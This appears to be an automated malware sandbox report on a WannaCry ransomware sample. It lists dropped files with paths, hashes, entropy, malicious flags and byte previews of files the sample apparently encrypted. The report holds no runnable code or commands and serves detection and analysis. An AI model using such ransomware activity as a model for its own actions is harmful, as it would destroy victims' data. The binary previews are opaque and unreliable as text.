                                                                                      Preview:L..................F.@.. ...$+.,.....Ob.1}..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IwX.u....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwX.u....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwX.u....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwX.u..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwX.u...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Mar 23 13:47:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2679
                                                                                      Entropy (8bit):4.002023061988246
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8ldMTwQsHTidAKZdA1duTeehOuTbbiZUk5OjqehOuTbCy+yT+:8Un1TfTbxWOvTbCy7T
                                                                                      MD5:74FC6E805427549FE34CA3640B2509F7
                                                                                      SHA1:81C1C68225A14F8CC7640A40A8DF962151661284
                                                                                      SHA-256:E534911EEFF72967D2D45EFC127D8BF903C772A50A41AEA2554819B95B82FBF3
                                                                                      SHA-512:21EBE2ACC28A249737611A47227E967FB48B43DC16A527106EFED677B1805B24DE15DF1B9A5B67539A1D60C174E03901BDB8FD9EBDF18B5F7DEF9F249A0DD9B7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.@.. ...$+.,.....M.1}..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IwX.u....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwX.u....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwX.u....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwX.u..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwX.u...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):21400
                                                                                      Entropy (8bit):7.991961254204645
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:s0BvCpVI6rTnVUrhXpaxH+kQiwlt4FmNI6k9iUbPBRSpHqD9cwsHYNChstOTY:s0RCnNrTVUrlpaxe5iwligvk97bPBkwB
                                                                                      MD5:BDE83BCC195E65C645E7D73D59C3E255
                                                                                      SHA1:ACA775FF0D1FD4E8E6CF49707E8349337785B348
                                                                                      SHA-256:942D7AF3DD93BA83A493242E98AC970C0589BF35E2E2C1685F471D984463AB89
                                                                                      SHA-512:A37735699A935483C00E3691A93D3E194C40FE0C47700918583E4D4A00D7803FF736C01945790BBD84B790A6695AE1A56447A65BBC4C7EA014EFB4E4BED7062C
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....f!.4...)!8..i.....0b...8..g_].A".B...y.`...e....:..D....4...3.....7UFR.yU.....Y.nI:.!....)=1.D.d..S..n..=.....N.7.w...W..rY.&kj|. ..L.G.!.T.s.k..*.v.....Y....r.Zsk..y..q.....(%.......m...X...R}...ACy&..\=K...u#V.m.$..gC.eh.>...6.../h...4=R..=.......sR......!...0}.9.p.....~..e....2A,.gm7..tD8..S...s.b..dt@.....4...X.K..NJ.....e.Y....:./a..z...{......V..Y".Y.......%..$...m|.....z$.=.t..&.t..I..1..hD7..b-....F.&.D..Q....1.?.?...dD%..v.......N......L7L.{k...^....H.......7)..9\..C. z.#49#.SN.V.'....^..6K.5."...\L...z..2...{..,]{.3a=.u.,a5.g..,&kb'[..5`...Y!...>..#.9}."..\.1.....g^..A!O!;.}]7...F...GN(...g..%dO@..l..}....h..].=.....J.....h....6...?.7.>_...$@Gnb.........&...Q. MBB.m.t.Z......g.wz.-D&."...8}.R.*g9.e$.D.....e..PL6..\K...o(......] .Z..R..X.T5......v.?..&.d....-T8..C]>.C.{.,.w.T..P....L...P..O.Wu.......U..4..c..ud.0.Z.....J7..M.n#..y..1..-1C.}.[.F..[..F....B@...2".Ow..L..T.H6...D..!a...x...M....V.[.)aER.OC....N...k.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):21400
                                                                                      Entropy (8bit):7.991961254204645
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:s0BvCpVI6rTnVUrhXpaxH+kQiwlt4FmNI6k9iUbPBRSpHqD9cwsHYNChstOTY:s0RCnNrTVUrlpaxe5iwligvk97bPBkwB
                                                                                      MD5:BDE83BCC195E65C645E7D73D59C3E255
                                                                                      SHA1:ACA775FF0D1FD4E8E6CF49707E8349337785B348
                                                                                      SHA-256:942D7AF3DD93BA83A493242E98AC970C0589BF35E2E2C1685F471D984463AB89
                                                                                      SHA-512:A37735699A935483C00E3691A93D3E194C40FE0C47700918583E4D4A00D7803FF736C01945790BBD84B790A6695AE1A56447A65BBC4C7EA014EFB4E4BED7062C
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....f!.4...)!8..i.....0b...8..g_].A".B...y.`...e....:..D....4...3.....7UFR.yU.....Y.nI:.!....)=1.D.d..S..n..=.....N.7.w...W..rY.&kj|. ..L.G.!.T.s.k..*.v.....Y....r.Zsk..y..q.....(%.......m...X...R}...ACy&..\=K...u#V.m.$..gC.eh.>...6.../h...4=R..=.......sR......!...0}.9.p.....~..e....2A,.gm7..tD8..S...s.b..dt@.....4...X.K..NJ.....e.Y....:./a..z...{......V..Y".Y.......%..$...m|.....z$.=.t..&.t..I..1..hD7..b-....F.&.D..Q....1.?.?...dD%..v.......N......L7L.{k...^....H.......7)..9\..C. z.#49#.SN.V.'....^..6K.5."...\L...z..2...{..,]{.3a=.u.,a5.g..,&kb'[..5`...Y!...>..#.9}."..\.1.....g^..A!O!;.}]7...F...GN(...g..%dO@..l..}....h..].=.....J.....h....6...?.7.>_...$@Gnb.........&...Q. MBB.m.t.Z......g.wz.-D&."...8}.R.*g9.e$.D.....e..PL6..\K...o(......] .Z..R..X.T5......v.?..&.d....-T8..C]>.C.{.,.w.T..P....L...P..O.Wu.......U..4..c..ud.0.Z.....J7..M.n#..y..1..-1C.}.[.F..[..F....B@...2".Ow..L..T.H6...D..!a...x...M....V.[.)aER.OC....N...k.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):440
                                                                                      Entropy (8bit):7.4508794400935985
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEJb8QaIsNrozn2BKJaZ+4ySNhF7Pnlk5Spp9BulD4lh2tMz:bk/fNroznU1pNfnln9BulDok+
                                                                                      MD5:C85B2D6106DB838D618D7DF4F88494EB
                                                                                      SHA1:7599BEFFD0EDC49FDE64FAA0443201234C548DBB
                                                                                      SHA-256:8DEDEDCDC74862BBC6109ADA1C98FD96DC675FC5532D44D291D9CA44D92B324E
                                                                                      SHA-512:46BDE085D11C3E4563B1BF7A87B0864D39810FACE4BC647252F1AEC55CCA6AFD70B33E9213178729469168308B59E5198335735771EBA4F3236FB0963E79E6C2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......K.I.>T..>.F...<....4....W:)()t..R.b .qt\...b.f/Fy8.({.&.r..z..{..f........#".....0....x..#'..nn.W.......1'.....Y...4_......Y...yKW.....~........o..6...f.A...o%U7%v.*.h)1....}..M..`).Q.K!9..o...7.m.+.5.<..[........UH..|..'....oJ...8..TY....r;............VG4....'..;..i...Js.~A..~2....+5..7.g.qy.o..,7...a..?M.....S....l6.Z.E..B..41..X.$....<...I..c...7_S#.bO4.{.).Q>e..v.....C".+Q..0.MU.......x......K..i.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):440
                                                                                      Entropy (8bit):7.4508794400935985
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:bkEJb8QaIsNrozn2BKJaZ+4ySNhF7Pnlk5Spp9BulD4lh2tMz:bk/fNroznU1pNfnln9BulDok+
                                                                                      MD5:C85B2D6106DB838D618D7DF4F88494EB
                                                                                      SHA1:7599BEFFD0EDC49FDE64FAA0443201234C548DBB
                                                                                      SHA-256:8DEDEDCDC74862BBC6109ADA1C98FD96DC675FC5532D44D291D9CA44D92B324E
                                                                                      SHA-512:46BDE085D11C3E4563B1BF7A87B0864D39810FACE4BC647252F1AEC55CCA6AFD70B33E9213178729469168308B59E5198335735771EBA4F3236FB0963E79E6C2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......K.I.>T..>.F...<....4....W:)()t..R.b .qt\...b.f/Fy8.({.&.r..z..{..f........#".....0....x..#'..nn.W.......1'.....Y...4_......Y...yKW.....~........o..6...f.A...o%U7%v.*.h)1....}..M..`).Q.K!9..o...7.m.+.5.<..[........UH..|..'....oJ...8..TY....r;............VG4....'..;..i...Js.~A..~2....+5..7.g.qy.o..,7...a..?M.....S....l6.Z.E..B..41..X.$....<...I..c...7_S#.bO4.{.).Q>e..v.....C".+Q..0.MU.......x......K..i.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):824
                                                                                      Entropy (8bit):7.757321375667267
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYVdWfp4Hh3GDdHOofCXoYwT7IxenlhMygBNpOV89FetKMy:bkYrE4H6HxUNCIc0/iV8R
                                                                                      MD5:FC07459B24D6DCE8836208A6B2B85906
                                                                                      SHA1:56CEFEA2D33576C5122361ED5F8F4189387174D6
                                                                                      SHA-256:C6BA7EBDA9D23EE32B8D3683216DEF2EC3B7DB802A408E3F913DDFB3DC5805B6
                                                                                      SHA-512:2344CFD436A793CF8EE6F99FDD061779A6AD1A4183AA7633F135BB96EF7911C82B85F8639738E7824BE4A73763D76FE813309CC9572B312F059961A6BED89DDC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....}..E...|.C..c0.O........$.T.0q...M.......F...C.|.N..]..1.bG.f........D...9...[.3....y?...........2\.[...S..q.....O.I....zTB...s..6@........zx....J.;.?.[./......s..?..`v".I......'..WB..T..kc..F..w.....(....8.7..=....(I.`-u.<...1.CZ}2./....:..rLv............]...&..+ W:M..`.K.!.....)gI.`9..K...mN.#7..<.....,r.R...Z1...G.J.Ii>=w..N....@.......^-....ce.....r..KU...!.|.p.....8..<..''.....".M..G_.....<'...........5.M..K..../.-0*....@/...`..3u..+.<.......T$bGN.D.M....o..t,.6..|...V.*JW?pj.L2oW.L.eTv.UhJ...(.G..^......c&!.aMd!..,PZ&.4.e.2j....@8....l^..0...[......1.BX....D..%.f..n..).in.!JV.1.....l)5..h.........a....)!........)1...{.xQ..&..l.,.p|.........;Sk.N.NV..K..^..7TvKS0.3..;.Q<|.e..2a.....F._..*.{.'.... M/..S2v~y....B.....!o<..{.|.....MZnw..scFZ.[...$....U.'`Q..^KJk..w.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):824
                                                                                      Entropy (8bit):7.757321375667267
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYVdWfp4Hh3GDdHOofCXoYwT7IxenlhMygBNpOV89FetKMy:bkYrE4H6HxUNCIc0/iV8R
                                                                                      MD5:FC07459B24D6DCE8836208A6B2B85906
                                                                                      SHA1:56CEFEA2D33576C5122361ED5F8F4189387174D6
                                                                                      SHA-256:C6BA7EBDA9D23EE32B8D3683216DEF2EC3B7DB802A408E3F913DDFB3DC5805B6
                                                                                      SHA-512:2344CFD436A793CF8EE6F99FDD061779A6AD1A4183AA7633F135BB96EF7911C82B85F8639738E7824BE4A73763D76FE813309CC9572B312F059961A6BED89DDC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....}..E...|.C..c0.O........$.T.0q...M.......F...C.|.N..]..1.bG.f........D...9...[.3....y?...........2\.[...S..q.....O.I....zTB...s..6@........zx....J.;.?.[./......s..?..`v".I......'..WB..T..kc..F..w.....(....8.7..=....(I.`-u.<...1.CZ}2./....:..rLv............]...&..+ W:M..`.K.!.....)gI.`9..K...mN.#7..<.....,r.R...Z1...G.J.Ii>=w..N....@.......^-....ce.....r..KU...!.|.p.....8..<..''.....".M..G_.....<'...........5.M..K..../.-0*....@/...`..3u..+.<.......T$bGN.D.M....o..t,.6..|...V.*JW?pj.L2oW.L.eTv.UhJ...(.G..^......c&!.aMd!..,PZ&.4.e.2j....@8....l^..0...[......1.BX....D..%.f..n..).in.!JV.1.....l)5..h.........a....)!........)1...{.xQ..&..l.,.p|.........;Sk.N.NV..K..^..7TvKS0.3..;.Q<|.e..2a.....F._..*.{.'.... M/..S2v~y....B.....!o<..{.|.....MZnw..scFZ.[...$....U.'`Q..^KJk..w.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):229656
                                                                                      Entropy (8bit):7.999173268308954
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:buqYNNrYdQS6Ok/AzwadWd4E8K7z1LuW5IKv/SfM/f3rT:buqYLrYK7Ok/6waRE8Ktpv/HTT
                                                                                      MD5:FCBC99339F1AFE979E916995F4F6F3A4
                                                                                      SHA1:65A26219128C1B3F8E147C8E534CC2F305899CCC
                                                                                      SHA-256:6963825BD32FC5CB52820DA4EA0CB9DE7970AB15DB803B67BB2BF4060E01A0CE
                                                                                      SHA-512:8BF349C30F7199873E03E481E28B677B00606CD15C651DEAC585E96834398707BB8A37AEC67872442341F0C30D25AD651626DEBBF631F5D7B1FC30BC7AC3F540
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......f}...K..s..C..W3....c..XC.T.nJ.z..Z.......\.6....{W.V....u....S.!>F..@...>iE..C.....u..#..\...)Z..`~..F}O-.Q.G...f.{<SyoK7.7R....?W..Q..k..\.........w..T.w..8....3....<.`SE.l.:gs...".E..Q[^B.f........"]u.{CA.....6>1..rQ..F}.*..4..%...R.).N.Z............../........u...W..k.+.fjP...... x.+..\.....y.3!...v..vt3..5e.>1....l;....j\.......T.Vo.'.3..8y&...o.?.?;...B.Z@._'.....AGh.....v.......,.?V-..r...../}.e$.).hV..%.mD...NZ.U.t._C....uG..=....W.2...-.)..".EM...&E.T...Tk.L..d..Ug".e...y.....#g&..z..,Oj...P....Uk0.....).e.O.....1.*.,.A.M...;.....D.._Inv."......5.%.eQz*.:"f.a...6.A.}...[.,mQ.....a..N..=.:.^...Yz..(.|..).......>2.C..|.!(.c...z<qt..L.5....`..o^..&.J.ZNx.]@..a.<.0. .X..g.(....q.....+b....x.T..R..;...<...q..ea....K.r.....>W.q3R^..J........h....[;....P..x....;1i..l...\.J..{Y.!'....|...[DiAh.K.a...dQ.....38.....|.M...Re.pTH..<..Q.Y0...[...+..B.i.r:..C:Q`..B\....ka..m...rUG._....5y..........^.?.n.{.e.:.|........S
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):229656
                                                                                      Entropy (8bit):7.999173268308954
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:buqYNNrYdQS6Ok/AzwadWd4E8K7z1LuW5IKv/SfM/f3rT:buqYLrYK7Ok/6waRE8Ktpv/HTT
                                                                                      MD5:FCBC99339F1AFE979E916995F4F6F3A4
                                                                                      SHA1:65A26219128C1B3F8E147C8E534CC2F305899CCC
                                                                                      SHA-256:6963825BD32FC5CB52820DA4EA0CB9DE7970AB15DB803B67BB2BF4060E01A0CE
                                                                                      SHA-512:8BF349C30F7199873E03E481E28B677B00606CD15C651DEAC585E96834398707BB8A37AEC67872442341F0C30D25AD651626DEBBF631F5D7B1FC30BC7AC3F540
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......f}...K..s..C..W3....c..XC.T.nJ.z..Z.......\.6....{W.V....u....S.!>F..@...>iE..C.....u..#..\...)Z..`~..F}O-.Q.G...f.{<SyoK7.7R....?W..Q..k..\.........w..T.w..8....3....<.`SE.l.:gs...".E..Q[^B.f........"]u.{CA.....6>1..rQ..F}.*..4..%...R.).N.Z............../........u...W..k.+.fjP...... x.+..\.....y.3!...v..vt3..5e.>1....l;....j\.......T.Vo.'.3..8y&...o.?.?;...B.Z@._'.....AGh.....v.......,.?V-..r...../}.e$.).hV..%.mD...NZ.U.t._C....uG..=....W.2...-.)..".EM...&E.T...Tk.L..d..Ug".e...y.....#g&..z..,Oj...P....Uk0.....).e.O.....1.*.,.A.M...;.....D.._Inv."......5.%.eQz*.:"f.a...6.A.}...[.,mQ.....a..N..=.:.^...Yz..(.|..).......>2.C..|.!(.c...z<qt..L.5....`..o^..&.J.ZNx.]@..a.<.0. .X..g.(....q.....+b....x.T..R..;...<...q..ea....K.r.....>W.q3R^..J........h....[;....P..x....;1i..l...\.J..{Y.!'....|...[DiAh.K.a...dQ.....38.....|.M...Re.pTH..<..Q.Y0...[...+..B.i.r:..C:Q`..B\....ka..m...rUG._....5y..........^.?.n.{.e.:.|........S
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):295192
                                                                                      Entropy (8bit):7.999365479549015
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:JIyVCUeL3uCOZcU+wlNxy9rDjCr8UKany6kR92ADd:JIy0UNxtknUKaQb2A5
                                                                                      MD5:56C8444D86E7C546D47706A9D5FA0040
                                                                                      SHA1:A3EADD5E506321ABBB27AB1411B52368017ADCD8
                                                                                      SHA-256:EC631D349FAA41C1CB301D67608731EA677EB0E0441092BC81D27758C9AF5024
                                                                                      SHA-512:38FAD9E13595EC4E84589E75C689EC35D893FB6F9DDE9E2EA8E1AA56835AC2DAAA5511CD9B96B1DA13F4DEAA6F895E48220E267166B357D95CFD9057DC61D3B1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....?D1...`.I...S..I$>35.k.rl...o.iO..J..q..MM.;..j.=...|4....p....c.b.0.A..e6!......?0.Y5.m..j'jo.TK..x....y.....0.......@...B.B....P/......G.j...u....t.w.F.{..X....5|#....'...i?-..S.i........................?y..{....E.h>d.3X8}y...'.R?.'...................~.(bW...s./W;{>/..b>G5...G.O0"..W.)'.D.r.....D.M&.:...}1..=1....H..../.*.....U.p..e^.XiM9..r...2".f....ip.:9X.;.....x.*..gS}s|...J>..I.#.^.WO.#.^Po,.S..n..%..}.?.n.{...z...?'..G.=..yH..y.ZL......I.p..b.....n..:....n....#[.....E%.in*S1+./.......I......A....*.k6smW....W.p,.....>+9.q..0..sJ.+.IT...)5..G._.A....?u~Y1...}~#..fDV?..#.p.-.q.YM....i?.R.V........,h>a..:.k.%b<_..4.....32..........Q.~..0...C....#.K.......i...O........u8A..T$..'.5Ro...8o..U(C....N.K..(.2X.\.....%...W.>.D.<....!.....b..v..+.W...6.@.1VD.(.......=.`..N.KU.`bw{.1E"..$.....+Z....p.0.K..i..5..0.....k....`..."&../..ht.m..n.|f.../.EP...~'.">..y..!.l.}n...;...h,....d...Y.q.....>...k.V.q`..T.. .K..(UW
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):295192
                                                                                      Entropy (8bit):7.999365479549015
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:JIyVCUeL3uCOZcU+wlNxy9rDjCr8UKany6kR92ADd:JIy0UNxtknUKaQb2A5
                                                                                      MD5:56C8444D86E7C546D47706A9D5FA0040
                                                                                      SHA1:A3EADD5E506321ABBB27AB1411B52368017ADCD8
                                                                                      SHA-256:EC631D349FAA41C1CB301D67608731EA677EB0E0441092BC81D27758C9AF5024
                                                                                      SHA-512:38FAD9E13595EC4E84589E75C689EC35D893FB6F9DDE9E2EA8E1AA56835AC2DAAA5511CD9B96B1DA13F4DEAA6F895E48220E267166B357D95CFD9057DC61D3B1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....?D1...`.I...S..I$>35.k.rl...o.iO..J..q..MM.;..j.=...|4....p....c.b.0.A..e6!......?0.Y5.m..j'jo.TK..x....y.....0.......@...B.B....P/......G.j...u....t.w.F.{..X....5|#....'...i?-..S.i........................?y..{....E.h>d.3X8}y...'.R?.'...................~.(bW...s./W;{>/..b>G5...G.O0"..W.)'.D.r.....D.M&.:...}1..=1....H..../.*.....U.p..e^.XiM9..r...2".f....ip.:9X.;.....x.*..gS}s|...J>..I.#.^.WO.#.^Po,.S..n..%..}.?.n.{...z...?'..G.=..yH..y.ZL......I.p..b.....n..:....n....#[.....E%.in*S1+./.......I......A....*.k6smW....W.p,.....>+9.q..0..sJ.+.IT...)5..G._.A....?u~Y1...}~#..fDV?..#.p.-.q.YM....i?.R.V........,h>a..:.k.%b<_..4.....32..........Q.~..0...C....#.K.......i...O........u8A..T$..'.5Ro...8o..U(C....N.K..(.2X.\.....%...W.>.D.<....!.....b..v..+.W...6.@.1VD.(.......=.`..N.KU.`bw{.1E"..$.....+Z....p.0.K..i..5..0.....k....`..."&../..ht.m..n.|f.../.EP...~'.">..y..!.l.}n...;...h,....d...Y.q.....>...k.V.q`..T.. .K..(UW
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):808
                                                                                      Entropy (8bit):7.7225049337097325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk4A2ZZpew8ii2XVoi4bOyYwhIbX8r03EovIq:bkcfpevmN9yYwWZ0MX
                                                                                      MD5:CB29DBE480AE525F39C2ED605F19027D
                                                                                      SHA1:4EA7D53D6142F6FEB36B7C8AD8B12678E6D47782
                                                                                      SHA-256:65501B61C23C2CE538927136514B0242EB96C3187E1EAF0D11B18FCD787CD729
                                                                                      SHA-512:9298C43A38FA11B9EF354DA30344C77E4936B0AF7760959E9FD8D0A0D120FC738DC2714BF23588AE8693F7CB848ADEA09DDE8A61443700CF2E71DE814F2E0A97
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......"#..u...`.3..B.].=.h.H..#W.;8L...2.RD)Hs]s...x#...W.Kh{o.....0...x.K.>..,\nQ.U..e.a+....N..|<..+..n^..>....W....O....L.v.vyoOVZ.c...f.|KR...q\...Uxp...M.x...!.*........).k....D".(@.l.{A...'._...7.r...S....]i9.a:.-.s.h%....G..&.........J.,N.............J\..Ys.....3r..7.0..|.~.......Ng...!p.~0.(f.....z..!.q..C.....,P.......g..ys.....^K...w...g.....J&L.Z?. e...t.|.h.hL..zM.O"}........tL.[.P.. t+8.G\.....t......:.....Z/.m..-..9./6..9.qy......x."./.>..}.)a.wo........!...*..w0Om,.L5)..M...m._,....~h..Z...YT?.?....z...,\.............aL......wL.n..J...L&...n{Ij".55#C...c.......{.~.V...Tti^..T...D...x....".^J..c.3...Yh..x.w1...;....p.R.........'W..2......\.\grQV....}...Y.A.A..CS....`=..~.;~...St:.I..{..J"..2.....,W...kiMZ._..Ut..X*....TP........x..;...O.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):808
                                                                                      Entropy (8bit):7.7225049337097325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk4A2ZZpew8ii2XVoi4bOyYwhIbX8r03EovIq:bkcfpevmN9yYwWZ0MX
                                                                                      MD5:CB29DBE480AE525F39C2ED605F19027D
                                                                                      SHA1:4EA7D53D6142F6FEB36B7C8AD8B12678E6D47782
                                                                                      SHA-256:65501B61C23C2CE538927136514B0242EB96C3187E1EAF0D11B18FCD787CD729
                                                                                      SHA-512:9298C43A38FA11B9EF354DA30344C77E4936B0AF7760959E9FD8D0A0D120FC738DC2714BF23588AE8693F7CB848ADEA09DDE8A61443700CF2E71DE814F2E0A97
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......"#..u...`.3..B.].=.h.H..#W.;8L...2.RD)Hs]s...x#...W.Kh{o.....0...x.K.>..,\nQ.U..e.a+....N..|<..+..n^..>....W....O....L.v.vyoOVZ.c...f.|KR...q\...Uxp...M.x...!.*........).k....D".(@.l.{A...'._...7.r...S....]i9.a:.-.s.h%....G..&.........J.,N.............J\..Ys.....3r..7.0..|.~.......Ng...!p.~0.(f.....z..!.q..C.....,P.......g..ys.....^K...w...g.....J&L.Z?. e...t.|.h.hL..zM.O"}........tL.[.P.. t+8.G\.....t......:.....Z/.m..-..9./6..9.qy......x."./.>..}.)a.wo........!...*..w0Om,.L5)..M...m._,....~h..Z...YT?.?....z...,\.............aL......wL.n..J...L&...n{Ij".55#C...c.......{.~.V...Tti^..T...D...x....".^J..c.3...Yh..x.w1...;....p.R.........'W..2......\.\grQV....}...Y.A.A..CS....`=..~.;~...St:.I..{..J"..2.....,W...kiMZ._..Ut..X*....TP........x..;...O.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):9608
                                                                                      Entropy (8bit):7.979649480258606
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:zM3HUC7zKU7uwjfyf/WL+xnToh5/38EBEi4B6+vadBZOY26yT4RxG9:z+FVuUa/jxTysEEyTUYFyERq
                                                                                      MD5:3C537E7FFE8CFCA70D203AB9412F32CF
                                                                                      SHA1:BDEDB20741AC964D852BC6165956FF6E9F5EC08D
                                                                                      SHA-256:6B094FF7BF4DF45575EB8DBE13E4483C5691785DA19A0C61E52D2D2C87DEE809
                                                                                      SHA-512:C55A409E91D0F8E8198086E9ED941F73A6B05EF2E8462D04A42608A3E5777B9C542A5C036BF5896EA594E93E3172C971F3C38B294CD2D51315D047706A8AEB3A
                                                                                      Malicious:false
                                                                                      Reputation:low
